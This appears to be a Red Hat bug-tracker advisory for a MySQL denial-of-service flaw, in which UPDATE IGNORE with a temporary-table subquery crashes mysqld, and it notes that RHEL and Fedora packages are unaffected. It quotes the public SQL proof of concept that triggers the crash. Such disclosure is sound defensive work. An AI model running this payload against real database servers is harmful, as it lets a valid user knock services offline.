Hide Forgot
It was found that MySQL server did not properly handle SQL UPDATE IGNORE statements, which included a subquery that was evaluated using a temporary table. A remote attacker, valid SQL user could use this flaw to cause denial of service (mysqld daemon to terminate with assertion failure). References: [1] http://dev.mysql.com/doc/refman/5.1/en/news-5-1-52.html [2] http://bugs.mysql.com/bug.php?id=54543 Note: On Red Hat Enterprise Linux systems mysqld daemon is not compiled with built-in assertion checks support, thus as such would not be affected by this issue.
Public PoC from [2]: ==================== drop table if exists `t1`; create table `t1`(`a` int not null)engine=myisam; insert into `t1` values (1),(2),(3); update ignore (select (select count(*) from `t1` group by @@server_id, `a`) as `a` from `t1`) `x`,`t1` set `t1`.`a`=`x`.`a`;
This issue did NOT affect the versions of the mysql package, as shipped with Red Hat Enterprise Linux 4, 5, or 6. -- This issue did NOT affect the versions of the mysql package, as shipped with Fedora release of 14 and 15.